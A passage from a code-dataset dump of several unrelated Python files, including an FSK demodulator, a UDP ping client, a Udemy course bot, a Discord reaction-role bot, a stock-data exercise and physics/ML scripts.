convertBits(bits):\n # bits are in little endian order\n bits = np.flip(bits, axis=0)\n # dot bits with power of 2 array\n asciiVal = bits.dot(np.flip(2**np.arange(bits.size), axis=0))\n return chr(asciiVal) \n\n\n# loads modulation file, reads and decodes ASCII message 1 frame at a time\ndef decode(modFile):\n # save message for return val\n message = []\n\n # load wav data and stats\n data, sampleRate = sf.read(modFile, dtype=WAV_DATATYPE)\n frameSize = sampleRate // BAUD_RATE\n print(f\"\\nStats: sample rate {sampleRate}, frame size {frameSize}\")\n\n # create decoder object\n decoder = Demodulator(sampleRate, frameSize)\n\n # init loop vars\n start = False\n cntBits = 0\n bits = []\n\n # start of message\n print(\"\\n\\\"\", end=\" \")\n\n # mimic real-time, read blocks from file like it's a buffer\n for frame in sf.blocks(modFile, blocksize = frameSize):\n\n # wait for start bit\n if start == False and decoder.decode(frame) == SPACE:\n start = True\n\n # read the byte \n elif start == True and cntBits < 8:\n 
bits.append(decoder.decode(frame))\n cntBits += 1\n\n elif start == True and cntBits == 8:\n # verify next bit is end bit\n assert decoder.decode(frame) == MARK, \"Stop bit not detected\"\n letter = convertBits(bits)\n print(letter, end=\" \")\n message.append(letter)\n bits = []\n cntBits = 0\n start = False\n \n # end of message \n print(\" \\\"\\n\")\n\n return message\n\n\ndef main():\n modFile = sys.argv[1]\n\n # decodes message in modulation file\n message = decode(modFile)\n\n print(\"Demodularization complete!\\n\")\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"MerlinPCarson/demodulation","sub_path":"demod.py","file_name":"demod.py","file_ext":"py","file_size_in_byte":3153,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"27"} +{"seq_id":"72521555273","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Dec 28 01:44:37 2016\n\n@author: salem7mg\n\"\"\"\nfrom sklearn import svm, datasets, grid_search, metrics,cross_validation,tree\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.externals import joblib\nfrom sklearn.cross_validation import train_test_split\n\nimport multiprocessing as mp\nimport os\nimport sys\nsys.path.append('/home/salem7mg/AzumiSanjin/Ind')\nimport time\nimport numpy as np\nimport talib\nimport main2\nfrom sklearn.grid_search import GridSearchCV \nfrom sklearn import datasets\nfrom sklearn.externals import joblib\n\nfrom MyInd import MyInd\n\nparameters = {\n 'n_estimators' : [5, 10, 20, 30, 50, 100, 300],\n 'random_state' : [0],\n 'n_jobs' : [3],\n 'min_samples_split' : [5, 10, 15],\n 'max_depth' : [3, 5, 10, 15, 20, 25, 30, 40, 50, 100]\n}\ndef IndGrid(Sybol,TimeFrame,fromx,to):\n can=np.array(MyInd.CanRead(Sybol,TimeFrame,fromx,to))\n label=main2.IndPredict(can,9,9)\n p = mp.Pool(mp.cpu_count())\n processes = []\n for i in range(len(main2.Ind)):\n #for i in range(1):\n processes.append((main2.TrVal1,Sybol,TimeFrame,i,can[:len(can)],9,9))\n p.map(main2.argwrapper,processes)\n p.close()\n processes = []\n del p\n tmpdir='/tmp/'\n\n for i in range(len(main2.Ind)): \n if not os.path.exists('/home/salem7mg/Documents/Python/'+main2.Ind[i][1]+\".txt\"): \n features=np.load(tmpdir+Sybol+TimeFrame+main2.Ind[i][1]+'.npy')\n clf = GridSearchCV(RandomForestClassifier(), parameters)\n clf.fit(features, label)\n fo = open('/home/salem7mg/Documents/Python/'+main2.Ind[i][1]+\".txt\", 'w')\n sys.stdout = fo\n print(main2.Ind[i][1]+\"best-->\",clf.best_estimator_)\n print(\"\\n+ トレーニングデータでCVした時の平均スコア:\\n\")\n for params, mean_score, all_scores in clf.grid_scores_:\n print (\"{:.3f} (+/- {:.3f}) for {}\".format(mean_score, all_scores.std() / 2, params))\n\n print (\"\\n+ テストデータでの識別結果:\\n\")\n #y_true, y_pred = y_test, clf.predict(X_test)\n #print (classification_report(y_true, y_pred))\n \"\"\" \n for j in range(i+1,len(main2.Ind)):\n fo = open('/home/salem7mg/Documents/Python/'+main2.Ind[i][1]+main2.Ind[j][1]+\"txt\", 'w')\n sys.stdout = fo\n main2.TrValx(Sybol,TimeFrame,i,j)\n features=np.load(tmpdir+Sybol+TimeFrame+main2.Ind[i][1]+main2.Ind[j][1]+'.npy') \n os.remove(tmpdir+Sybol+TimeFrame+main2.Ind[i][1]+main2.Ind[j][1]+'.npy')\n clf = GridSearchCV(RandomForestClassifier(), parameters)\n clf.fit(features, label)\n print(main2.Ind[i][1]+main2.Ind[j][1]+\"best-->\",clf.best_estimator_)\n print(\"\\n+ トレーニングデータでCVした時の平均スコア:\\n\")\n for params, mean_score, all_scores in clf.grid_scores_:\n print (\"{:.3f} (+/- {:.3f}) for {}\".format(mean_score, all_scores.std() / 2, params))\n\n print (\"\\n+ 
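A numerical check of the Goertzel detector above: correlating a frame against the mark frequency gives a much larger magnitude than against the space frequency when the frame holds a 2225 Hz tone. Sample rate and baud follow the script's Bell 103 constants; the synthetic frame is hypothetical.

import numpy as np

sample_rate, baud = 48000, 300
n = sample_rate // baud                       # 160 samples per bit frame
t = np.arange(n) / sample_rate
frame = np.sin(2 * np.pi * 2225 * t)          # pure mark tone

def goertzel_mag(samples, freq):
    w0 = 2 * np.pi * freq / sample_rate
    coeff = np.exp(-1j * w0 * np.arange(len(samples)))
    return abs(np.dot(samples, coeff))

print(goertzel_mag(frame, 2225) > goertzel_mag(frame, 2025))   # True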
Classification results on the test data:\n\")\n                y_true, y_pred = y_test, clf.predict(X_test)\n                print (classification_report(y_true, y_pred))\n            \"\"\"\n            os.remove(tmpdir+Sybol+TimeFrame+main2.Ind[i][1]+'.npy')\n    sys.stdout = sys.__stdout__\n    return\n    \nif __name__ == '__main__':\n    #IndMain2('USDJPY','10080','0','1167429600')\n    #IndMain2('USDJPY','1440','0','1167429600')\n    #IndMain2('USDJPY','240','0','1167429600')\n    #IndMain2('USDJPY','60','0','1167429600')\n    #IndGrid('USDJPY','30','0','1167429600')\n    IndGrid('USDJPY','15','0','1167429600')\n    #IndMain2('USDJPY','5','0','1167429600')\n    #IndMain2('USDJPY','1','0','1167429600')\n\n","repo_name":"salem7mg/trade2","sub_path":"trade/trade/Ind/Grid_sesrch.py","file_name":"Grid_sesrch.py","file_ext":"py","file_size_in_byte":3811,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"14204612967","text":"#! /usr/bin/env python3\n# Echo Client\nimport sys\nimport socket\nfrom timeit import default_timer as timer\nfrom struct import *\nfrom decimal import *\n\n\n# Get the server hostname, port and data length as command line arguments\nhost = sys.argv[1]\nport = int(sys.argv[2])\ncount = int(sys.argv[3]) # data length (third argument; was argv[2], which duplicated the port)\n# Sequence number holder/counter\nsequence_num = 1 \n# Counts num. of dropped periods\ndropped_num = 0\n# Number of Pings\nnum = 10 \n#Holds sec values (Min, Max,and Average) times\nmin_rttime = 0\nmax_rttime = 0\navg_rttime = 0\n\n# Create UDP client socket. Note the use of SOCK_DGRAM\nclientsocket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n\n# Timeout function w/ 1 sec. parameter after a period of inactivity (use to mess with timeout setting)\nclientsocket.settimeout(1)\n\nprint(\"Pinging \" + str(port) + \", \" + host)\n\n# Unpack and Responds with PING or Time Out ERROR\ndef response_from(): \n global dropped_num\n global count\n global sequence_num\n global sequence_num2\n global dataEcho\n while True:\n try:\n packed_data, address = clientsocket.recvfrom(count)\n unpacked_data = unpack('!hH', packed_data)\n sequence_num = unpacked_data[1]\n return \"PING\"\n except Exception as e:\n dropped_num+=1\n return \"Ping message \"+ str(sequence_num) + \" timed out\"\n\n\n# Sends the packets to server \ndef send_message(message, wait = False): # Sends the packets to server\n packed_data = pack('!hH', 1, sequence_num)\n clientsocket.sendto(packed_data,(host, port))\n\n if wait == False:\n return\n else:\n return response_from()\n\n\n# Loop controlling Number of Sending & Receiving transmission \nwhile sequence_num <= num:\n start = timer() # Starting timer\n data = \"\"\n dataEcho = \"\"\n recieved = send_message(data, True)\n end = timer() # Ending timer\n recieved_type = recieved # Stores return value\n rrttime = end - start # Calculate sec\n if recieved_type == \"PING\": # Execute when return value is PING\n print(\"Ping message number \" + str(sequence_num) + \" RTT: %f6 sec\" % rrttime)\n avg_rttime = avg_rttime + rrttime\n if rrttime < min_rttime or min_rttime == 0:\n min_rttime = rrttime\n if rrttime > max_rttime or max_rttime == 0:\n max_rttime = rrttime\n\n else: # Execute when return value is Timeout or not PING and prints what was returned\n print(recieved)\n\n sequence_num+=1 # Increments Sequence\n\n# Closes the client socket\nclientsocket.close()\n\n# Calculate Received Values & Packet Loss Percentage \nrecieved = num - dropped_num\npercentage = dropped_num * 10\n\n# Prints Statistics after the num of Sending & Receiving Transmission\nprint(\"\\nStatistics:\")\nprint(str(num) + \" packets transmitted, 
\" + str(recieved) + \" recieved, \" + str(percentage) + \"% packetloss\")\nprint(\"Min/Max/Avg RTT: min= %f6 / %f6 / %f6\" % (min_rttime, max_rttime, (avg_rttime/num)))\n\n \n","repo_name":"BrandanW123/Networking-UDP-Ping-Client-and-Server","sub_path":"ping-client.py","file_name":"ping-client.py","file_ext":"py","file_size_in_byte":2936,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"12515314486","text":"#!/usr/bin/python3\nimport xml.etree.ElementTree as ET\nimport sys,os\nfrom math import pi\nfrom stoheader import getstovalue,lastval\ntrajfile='Analyzes/Etraj30.0.0.0.055.sto'\nif len(sys.argv)>1:\n\ttrajfile=sys.argv[1]\n\tprint(\"computing on\",sys.argv[1])\nprint(\"-----start fixing actuators.xml-----\")\nellip=getstovalue(trajfile,'ellipticb');ellip=ellip[:-3]\nprint(\"reading variables from traj\")\nspA=getstovalue(trajfile,'num_of_springs_ankle');stifA=float(spA)*5/(0.05*0.05*pi/2)\nspH=getstovalue(trajfile,'num_of_springs_hip');stifH=float(spH)*5/(0.05*0.05*pi/2)\nspK=getstovalue(trajfile,'num_of_springs_knee');stifK=float(spK)*5/(0.05*0.05*pi/2)\nprint(spK,spH,spA,ellip)\nosimfilename=\"src/ellipse\"+ellip+\".osim\"\ntofill = ET.parse('actuators.xml')\nfiller = ET.parse(osimfilename)\ntofillroot=tofill.getroot()\ngotsprings=filler.findall('.//PathSpring')\ngotNL=filler.findall('.//NonlinearSpring')\nprint(\"removing nonlinear springs from actuators.xml\")\nprint(\"removing\",tofillroot[0][0].get(\"name\"))\ntofillroot[0].remove(tofillroot[0][0])\nprint(\"removing\",tofillroot[0][3].get(\"name\"))\ntofillroot[0].remove(tofillroot[0][3])\nprint(\"removing\",tofillroot[0][3].get(\"name\"))\ntofillroot[0].remove(tofillroot[0][3])\nprint(\"setting A/H/K to:\",stifA,stifH,stifK)\n\nprint(\"replacing stiffnesses values at actuators.xml\")\nprint(\"replacing\", gotsprings[1].get(\"name\"),\"to\", stifH)\ngotsprings[1].find(\"stiffness\").text=str(stifH )\nprint(\"replacing\",gotsprings[2].get(\"name\"),\"to\", stifA)\ngotsprings[2].find(\"stiffness\").text=str(stifA) \nprint(\"replacing\",gotNL[0].get(\"name\"),\"to\", stifK)\ngotNL[0].find(\"stiffness\").text=str(stifK )\ntofillroot[0].append(gotsprings[1])\ntofillroot[0].append(gotsprings[2])\ntofillroot[0].append(gotNL[0])\nprint(\"writing newactuators.xml as actuators\")\ntofill.write(\"newactuators.xml\")\nprint(\"-----start fixing analyze2.xml-----\")\n\nan2 = ET.parse('analyze2.xml')\nan2root=an2.getroot()\nprint(\"setting analyis name\")\nr=trajfile.split(\"/\")\nan2root[0].set(\"name\",\"EHA\"+r[1][5:-4])\nprint(\"relplacing controls_file states_file datafile\")\nan2root.find(\".//controls_file\").text=trajfile\nan2root.find(\".//states_file\").text=trajfile\nan2root.find(\".//datafile\").text=\"results/EGRF\"+trajfile[14:-4]+\".sto\"\nan2root.find(\".//model_file\").text=\"src/ellipse\"+ellip+\".osim\"\nprint(\"writing analyze2.xml \")\nan2.write(\"analyze2.xml\")\nos.system(\"opensim-cmd run-tool analyze2.xml&>/dev/null\")\nprint(\"query last point trajfrom\",trajfile[:-4].replace(\"traj\",\"HA\"))\nY=lastval(trajfile[:-4].replace(\"traj\",\"HA\")+'_BodyKinematics_pos_global.sto',\"center_of_mass_Y\")\nV=lastval(trajfile[:-4].replace(\"traj\",\"HA\")+'_BodyKinematics_vel_global.sto',\"center_of_mass_Y\")\nY=float(Y);V=float(V)\nprint(\"found Y and V\",Y,V)\nprint(spK,spH,spA,ellip,Y+V*V/2/9.81)\n\n#fil=sys.argv[1]\n#treename=sys.argv[2]\n#intree=ET.parse(fil)\n#dom = xml.dom.minidom.parse(fil) 
\n\n\n","repo_name":"ostr1969/contUpDown3Moco","sub_path":"Ellipse/computejump.py","file_name":"computejump.py","file_ext":"py","file_size_in_byte":2835,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"17308512404","text":"import udemy\nimport json\nimport Objects\nimport database\n\n##############################\n# TRANSFORMATION FUNCTIONS #\n############################\n\n\ndef course_list_to_links(courses):\n message = \"\\n\"\n count = 0\n number_emojis = ['1️⃣', '2️⃣', '3️⃣']\n for course in courses:\n course_line = number_emojis[count]+' : \\n'\n course_link = 'udemy.com/course/'+course.link\n message += course_line+course_link+'\\n\\n'\n\n count += 1\n\n return message\n\n\ndef courses_to_ids(courses):\n ids = []\n for course in courses:\n ids.append(str(course.unique))\n return ids\n\n\ndef course_list_to_message(courses):\n message = \"\\n\\n\"\n for course in courses:\n course_line = course.title+': \\n'\n course_link = 'udemy.com/course/'+course.link\n message += course_line+course_link\n message += '\\n\\n'\n\n return message\n\n##############################################\n# UDEMY API COURSES FUNCTIONS #\n############################################\n\n\ndef recomend_courses_to_user(topic, user, lang='es', amount=1):\n \"\"\"\n Selects courses of X topic from the database\n It excludes courses already recommended to the user\n If the quota of courses hasnt been fulfilled, then we search\n courses in the udemy API\n We add these courses to the database so that they can be\n recommended\n\n :param topic: The course topic\n :param user: Twitter user ID\n :param lang: language (for search purposes)\n :param amount: amount of courses to be recommended\n :return: List of courses\n \"\"\"\n\n # Obtain courses from database which are not in user courses list\n courses = database.give_courses_to_user(topic, lang, user, amount)\n\n # If the courses from database satisfy the quota, it is not\n # necessary to use the Udemy API\n size = len(courses)\n if size >= amount:\n return courses\n\n # Determine the amount of courses with same keyword and language in database\n # Then, calculate the start page for udemy API\n # This serves to potentially reduce time of searching\n topic_count = database.count_keyword(topic, lang)\n start_page = max(1, topic_count//10)\n\n # Get new courses from Udemy API\n additional_courses = search_udemy_courses(topic, amount-size, size=10, page=start_page, lang=lang).values()\n\n # Store courses in database\n database.register_many_courses(additional_courses)\n\n # Update id values of additional courses objects\n # Obtain the unique keys from database\n\n updated_additional_courses = []\n\n for additional_course in additional_courses:\n additional_course_object = database.get_course_by_id(additional_course.id)\n updated_additional_courses.append(additional_course_object)\n\n # Add new courses objects to courses to return\n courses.extend(updated_additional_courses)\n\n return courses\n\n\ndef get_course_details(course_id):\n details = Client.get_coursesdetail(course_id)\n parsed_details = json.loads(details)\n return parsed_details\n\n\ndef get_course_for_top(topic, lang='es'):\n\n course = database.get_course_from_database(topic, lang)\n if course is None:\n course = search_udemy_course(topic, lang, order='newest')\n if course is not None:\n database.register_course(course, topic)\n\n return course\n\n\ndef search_udemy_course(topic, lang='es', size=10, page=1, tries=0, order='relevance'):\n\n # 
course_list = Client.get_courseslist(language=lang, search=topic, page_size=size, page=page, price=\"price-free\",\n ordering=order)\n parsed_courses = json.loads(course_list)\n course_list = parsed_courses['results']\n amount = len(course_list)\n\n # If there are no courses (or too many tries) we return None\n if amount == 0 or tries >= 10:\n return None\n\n for course in course_list:\n course_id = int(course['id'])\n course_object = database.get_course_by_id(course_id)\n\n # If course is not None, then it is already in database\n if course_object is not None:\n continue\n\n course_title = course['title']\n course_link = course['url']\n course_link = course_link.replace('/course/', '')\n\n return Objects.Course(course_id, course_title, course_link, topic, lang=lang)\n\n\ndef search_udemy_courses(topic, amount, lang='es', size=10, page=1, tries=0, course_set=None, order='relevance'):\n\n if course_set is None:\n course_set = {}\n\n # If tried 2 times, change search settings to give priority to newer courses\n if tries == 2:\n page = 1\n order = 'newest'\n\n course_list = Client.get_courseslist(language=lang, search=topic, page_size=size, page=page, price=\"price-free\",\n ordering=order)\n parsed_courses = json.loads(course_list)\n course_list = parsed_courses['results']\n course_amount = len(course_list)\n\n # If there are no more results (or the paging/retry limits are hit) return what was collected so far\n if course_amount == 0 or (page*size) >= 10000 or tries >= 5:\n return course_set\n\n for course in course_list:\n\n course_id = int(course['id'])\n course_object = database.get_course_by_id(course_id)\n\n # If course is not None, then it is already in database\n if course_object is not None:\n continue\n\n course_title = course['title']\n course_link = course['url']\n course_link = course_link.replace('/course/', '')\n\n course_object = Objects.Course(course_id, course_title, course_link, topic, lang=lang)\n course_set.update({course_object.id: course_object})\n\n if len(course_set) >= amount:\n return course_set\n\n if len(course_set) >= amount:\n return course_set\n\n return search_udemy_courses(topic, amount, lang, size, page+1, tries+1, course_set, order=order)\n\n\n# API INITIALIZATION\nClient = udemy.PyUdemy(clientID=\"Your udemy client id\",\n clientSecret=\"your udemy api secret\")\n\n\n","repo_name":"GuillermoClara/GratisBot","sub_path":"udemy_handler.py","file_name":"udemy_handler.py","file_ext":"py","file_size_in_byte":6007,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"39820796917","text":"\n# Constants for indexing the tuples:\nNAME,DATE,OPEN,MAX,MIN,CLOSE,VOLUME = 0,1,2,3,4,5,6\n\ndef main():\n lst = loadStockFile(\"nasdaq.csv\")\n # Show just first and last tuples:\n print(\"first:\", lst[1])\n print(\"last:\", lst[-1])\n \n print(\"a) totVol=\", totalVolume(lst))\n\n print(\"b) maxVal=\", maxValorization(lst))\n \n stocksDic = stocksByDateByName(lst)\n print(\"c) CSCO@11:\", stocksDic['2020-10-12']['CSCO'])\n print(\"c) AMZN@22:\", stocksDic['2020-10-22']['AMZN'])\n port = {'NFLX': 100, 'CSCO': 80}\n print(\"d) portfolio@01:\", portfolioValue(stocksDic, port, \"2020-10-01\"))\n print(\"d) portfolio@30:\", portfolioValue(stocksDic, port, \"2020-10-30\"))\n \ndef loadStockFile(filename):\n lst = []\n with open(filename) as f:\n for line in f:\n parts = line.strip().split('\t')\n name = parts[NAME]\n date = parts[DATE]\n tup = (name, date, float(parts[OPEN]), float(parts[MAX]),\n float(parts[MIN]), float(parts[CLOSE]), int(parts[VOLUME]))\n 
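# one tuple per CSV line: (name, date, open, max, min, close, volume)\n 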
lst.append(tup)\n return lst\n\ndef totalVolume(lst):\n totVol = {}\n for tup in lst:\n totVol[tup[NAME]] = totVol.get(tup[NAME], 0) + tup[VOLUME]\n return totVol\n\ndef maxValorization(lst):\n vMax = {}\n for tup in lst:\n vMax.setdefault(tup[DATE], (\"Bax\",0))\n\n for tup in lst:\n valorizacao = tup[CLOSE]/tup[OPEN] - 1\n if valorizacao > vMax[tup[DATE]][1]:\n vMax[tup[DATE]] = (tup[NAME], valorizacao)\n\n return vMax\n\ndef stocksByDateByName(lst):\n dic = {}\n for tup in lst:\n dic.setdefault(tup[DATE], {})\n for tup in lst:\n dic[tup[DATE]][tup[NAME]] = [tup[OPEN], tup[MAX], tup[MIN], tup[CLOSE], tup[VOLUME]]\n return dic\n\ndef portfolioValue(stocks, portfolio, date):\n assert date in stocks\n val = 0.0\n for key in portfolio:\n val += stocks[date][key][3] * portfolio[key]\n\n return val\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"abutuc/archive-university-of-aveiro","sub_path":"Programming Fundamentals/aula07/stocks.py","file_name":"stocks.py","file_ext":"py","file_size_in_byte":1957,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"35919925615","text":"import matplotlib.pyplot as plt\nfrom ase.io import read\nimport numpy as np\nimport sys\n\ndef moving_average(a, n=3):\n ret = np.cumsum(a, dtype=float)\n ret[n:] = ret[n:] - ret[:-n]\n return ret[n - 1:] / n\n\ndef rolling_window(a, window):\n #pad = np.ones(len(a.shape), dtype=np.int32)\n #pad[-1] = window-1\n #pad = list(zip(pad, np.zeros(len(a.shape), dtype=np.int32)))\n #a = np.pad(a, pad,mode='reflect')\n shape = a.shape[:-1] + (a.shape[-1] - window + 1, window)\n strides = a.strides + (a.strides[-1],)\n return np.lib.stride_tricks.as_strided(a, shape=shape, strides=strides)\n\nfig = plt.figure()\nax = fig.add_subplot(211)\ntx = fig.add_subplot(212)\nnx = tx.twinx()\n\nfname = sys.argv[1]\ndname = sys.argv[1].split('/')\ndname = '/'.join(dname[:-1])\n\n# Cut data that won't get averaged\nnave = 10 # Parameter\nif len(sys.argv)>2:\n nave = int(sys.argv[2])\ndata = np.loadtxt(fname)\nv0 = read(dname+'/model.xyz').get_volume()\nnrows = data.shape[0]\nnaves = nrows//nave\ndata = data[:int(naves*nave), :]\n\npressure = data[:, 3:6]\npbar = pressure.mean(axis=1)\npma = moving_average(pbar, n=nave)\npx = moving_average(pressure[:, 0], n=nave)\npy = moving_average(pressure[:, 1], n=nave)\npz = moving_average(pressure[:, 2], n=nave)\nif len(sys.argv)>3:\n pmst = rolling_window(pbar, nave).std(axis=-1)\nt = np.arange(pma.size)\npwin = pbar.reshape((-1, nave)).mean(axis=1)\npstd = pbar.reshape((-1, nave)).std(axis=1)\npm = pwin-pstd\npp = pwin+pstd\ntwin = np.arange(pwin.size)*nave\n\nax.plot(t, px, color='b', alpha=0.1)\nax.plot(t, py, color='b', alpha=0.1)\nax.plot(t, pz, color='b', alpha=0.1)\nax.hlines(0, t.min(), t.max(), color='k', zorder=0, alpha=0.8)\nax.fill_between(twin, pm, pp, color='b', alpha=0.2)\nax.plot(twin, pwin, alpha=1, color='b')\nax.plot(t, pma, alpha=0.6, color='b')\nax.set_xlabel('time (tau)')\nax.set_ylabel('P (GPa)')\nif len(sys.argv)>3:\n ax.plot(t, pma+pmst, alpha=0.4, color='b')\n ax.plot(t, pma-pmst, alpha=0.4, color='b')\nax.set_ylim([pma.min()-0.05, pma.max()+0.05])\n\nvolume = data[:, -3:]\nvbar = np.prod(volume, axis=1)\nvma = moving_average(vbar, nave)\nvma /= v0\nvma *= 100\nvma -= 100\nt = np.arange(vma.size)\n\ntx.plot(t, vma, color='r', alpha=1)\ntx.fill_between(t, vma, 0, color='r', alpha=0.1)\ntx.set_ylabel('Volume (A3)')\n#tx.set_ylim([1.-vf, 1.+vf])\n\ntemp = data[:, 0]\ntma = moving_average(temp, nave)\ntmin = 
tma.min()\ntmax = tma.max()\n\nnx.plot(t, tma, color='g', alpha=1)\nnx.set_ylim([tmin, tmax])\n\nplt.savefig(dname+'/PVT.png')\nprint('done!')\n","repo_name":"niklundgren/spanners","sub_path":"matsci/projects/amorphouscarbon/pressure-volume.py","file_name":"pressure-volume.py","file_ext":"py","file_size_in_byte":2488,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"5848200499","text":"import discord\n\nclient = discord.Client()\n\n@client.event\nasync def on_ready():\n\tprint(\"Bot connected!\")\n \n@client.event\nasync def on_raw_reaction_add(payload):\n\n message_id = payload.message_id # get the ID of the message that received the reaction\n\n\n if message_id == 634732408016601186: # check that this is really the message we want\n \n if payload.emoji.name == \"✅\":\n role_id = 634732495849521163 # get the role ID\n elif payload.emoji.name == \"❌\":\n role_id = 634732552342601740\n else:\n print(\"No match\")\n\n guild_id = payload.guild_id # get the server ID\n guild = client.get_guild(guild_id) # get the server from the ID\n\n user_id = payload.user_id # get the user ID\n member = guild.get_member(user_id) # get the member from the user ID\n\n role = guild.get_role(role_id) # get the role from the role ID\n\n await member.add_roles(role)\n\n \n\n@client.event\nasync def on_raw_reaction_remove(payload): # exactly the same thing,\n # except the role must be removed instead of added\n\n message_id = payload.message_id\n\n\n if message_id == 634732408016601186:\n \n if payload.emoji.name == \"✅\":\n role_id = 634732495849521163\n elif payload.emoji.name == \"❌\":\n role_id = 634732552342601740\n else:\n print(\"No role matches this emoji\")\n print(payload.emoji.name)\n\n guild_id = payload.guild_id\n guild = client.get_guild(guild_id)\n user_id = payload.user_id\n member = guild.get_member(user_id)\n role = guild.get_role(role_id)\n\n await member.remove_roles(role) # <------------ remove_roles() instead of add_roles()\n\nclient.run(\"\")","repo_name":"GravenDiscordPy/Graven_Discord.py","sub_path":"Commandes/ReactionRole.py","file_name":"ReactionRole.py","file_ext":"py","file_size_in_byte":1995,"program_lang":"python","lang":"fr","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"18534517667","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport sys\nimport warnings\nfrom thop import profile\ntry:\n from .warplayer import multi_warp\nexcept:\n from model.warplayer import multi_warp\nif not sys.warnoptions:\n warnings.simplefilter(\"ignore\")\nfrom models import flow_pwc\n\ndef pad(img, ratio=32):\n if len(img.shape) == 5:\n b, n, c, h, w = img.shape\n img = img.reshape(b * n, c, h, w)\n ph = ((h - 1) // ratio + 1) * ratio\n pw = ((w - 1) // ratio + 1) * ratio\n padding = (0, pw - w, 0, ph - h)\n img = F.pad(img, padding, mode='replicate')\n img = img.reshape(b, n, c, ph, pw)\n return img\n elif len(img.shape) == 4:\n n, c, h, w = img.shape\n ph = ((h - 1) // ratio + 1) * ratio\n pw = ((w - 1) // ratio + 1) * ratio\n padding = (0, pw - w, 0, ph - h)\n img = F.pad(img, padding, mode='replicate')\n return img\n\ndef conv(in_planes, out_planes, kernel_size=3, stride=1, padding=1, dilation=1):\n return nn.Sequential(\n nn.Conv2d(in_planes, out_planes, kernel_size=kernel_size, stride=stride,\n padding=padding, dilation=dilation, bias=True),\n nn.PReLU(out_planes)\n )\n\n\ndef 
deconv(in_planes, out_planes, kernel_size=4, stride=2, padding=1):\n return nn.Sequential(\n torch.nn.ConvTranspose2d(in_channels=in_planes, out_channels=out_planes,\n kernel_size=kernel_size, stride=stride, padding=padding, bias=True),\n nn.PReLU(out_planes)\n )\n\n\ndef conv_woact(in_planes, out_planes, kernel_size=3, stride=1, padding=1, dilation=1):\n return nn.Sequential(\n nn.Conv2d(in_planes, out_planes, kernel_size=kernel_size, stride=stride,\n padding=padding, dilation=dilation, bias=True),\n )\n\ndef conv_wo_act(in_planes, out_planes, kernel_size=3, stride=1, padding=1, dilation=1):\n return nn.Sequential(\n nn.Conv2d(in_planes, out_planes, kernel_size=kernel_size, stride=stride,\n padding=padding, dilation=dilation, bias=True),\n )\n\ndef get_same_padding(kernel_size, dilation):\n kernel_size = kernel_size + (kernel_size - 1) * (dilation - 1)\n padding = (kernel_size - 1) // 2\n return padding\n\nclass ResBlock(nn.Module):\n def __init__(self, inplanes, planes, kernel_size=3, stride=1, dilation=1):\n super(ResBlock, self).__init__()\n self.conv1 = nn.Conv2d(inplanes, planes, kernel_size=kernel_size, stride=stride,\n padding=get_same_padding(kernel_size, dilation), dilation=dilation)\n self.conv2 = nn.Conv2d(planes, planes, kernel_size=kernel_size, stride=1,\n padding=get_same_padding(kernel_size, dilation), dilation=dilation)\n self.relu = nn.PReLU(planes)\n\n self.res_translate = None\n if not inplanes == planes or not stride == 1:\n self.res_translate = nn.Conv2d(inplanes, planes, kernel_size=1, stride=stride)\n\n def forward(self, x):\n residual = x\n\n out = self.relu(self.conv1(x))\n out = self.conv2(out)\n if self.res_translate is not None:\n residual = self.res_translate(residual)\n out += residual\n\n return out\n\nclass IFBlock(nn.Module):\n def __init__(self, in_planes, scale=1, c=64, num_flows=3, mode='backward'):\n super(IFBlock, self).__init__()\n self.scale = scale\n self.conv0 = nn.Sequential(\n conv(in_planes, c, 3, 2, 1),\n conv(c, 2 * c, 3, 2, 1),\n )\n self.convblock = nn.Sequential(\n conv(2 * c, 2 * c),\n conv(2 * c, 2 * c),\n conv(2 * c, 2 * c),\n conv(2 * c, 2 * c),\n conv(2 * c, 2 * c),\n conv(2 * c, 2 * c),\n )\n if mode == 'backward':\n self.conv1 = nn.ConvTranspose2d(2 * c, 2 * num_flows * 2, 4, 2, 1) # TODO WARNING: Notable change\n elif mode == 'forward':\n self.conv1 = nn.ConvTranspose2d(2 * c, 2 * num_flows * 3, 4, 2, 1) # TODO WARNING: Notable change\n else:\n raise ValueError\n\n def forward(self, x):\n if self.scale != 1:\n x = F.interpolate(x, scale_factor=1. 
/ self.scale, mode=\"bilinear\",\n align_corners=False)\n # print(x.size())\n\n x = self.conv0(x)\n x = self.convblock(x)\n flow = self.conv1(x)\n # print(flow.size())\n if self.scale != 1:\n flow = F.interpolate(flow, scale_factor=self.scale, mode=\"bilinear\",\n align_corners=False)\n # print(flow.size())\n return flow\n\n\nclass FlowNetMulCatFusion(nn.Module):\n def __init__(self, num_flows=3):\n super(FlowNetMulCatFusion, self).__init__()\n self.num_flows = num_flows\n self.block0 = IFBlock(in_planes=6 + 2 * num_flows, scale=8, c=192, num_flows=num_flows)\n self.conv0 = conv_wo_act(2 * 2 * num_flows, 2 * 2 * num_flows, 1, 1, 0)\n self.block1 = IFBlock(in_planes=2 * (2 + 3 + 1) * num_flows, scale=4, c=128, num_flows=num_flows)\n self.conv1 = conv_wo_act(2 * 2 * num_flows, 2 * 2 * num_flows, 1, 1, 0)\n self.block2 = IFBlock(in_planes=2 * (2 + 3 + 1) * num_flows, scale=2, c=96, num_flows=num_flows)\n self.conv2 = conv_wo_act(2 * 2 * num_flows, 2 * 2 * num_flows, 1, 1, 0)\n self.block3 = IFBlock(in_planes=2 * (2 + 3 + 1) * num_flows, scale=1, c=48, num_flows=num_flows)\n self.conv3 = conv_wo_act(2 * 2 * num_flows, 2 * 2 * num_flows, 1, 